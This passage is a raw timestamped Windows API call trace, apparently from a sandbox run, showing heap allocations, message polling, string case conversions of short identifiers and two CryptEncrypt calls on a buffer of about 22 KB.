RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.807] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0187.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0187.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.808] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.821] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0187.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.821] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0187.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.821] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0187.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0187.822] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0187.822] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0187.822] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0187.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0187.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0187.822] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.823] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0187.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0187.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.823] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.823] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.824] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.824] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0187.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.824] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0187.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.824] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.825] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.825] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.825] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0187.825] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0187.825] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.825] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0187.825] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.826] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0187.826] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.826] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.826] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0187.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0187.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.827] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x58b8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x58c0) returned 1 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0187.827] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0187.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0187.828] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.828] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0187.828] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.829] CharLowerBuffW (in: lpsz="byte[22720]", cchLength=0xb | out: lpsz="byte[22720]") returned 0xb [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0187.829] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0187.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.830] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.830] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.830] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0187.830] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.830] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.830] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0187.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0187.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0187.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.831] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e2bd8*, pdwDataLen=0x8bef68*=0x58b8, dwBufLen=0x58c0 | out: pbData=0x24e2bd8*, pdwDataLen=0x8bef68*=0x58c0) returned 1 [0187.831] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.831] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.831] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 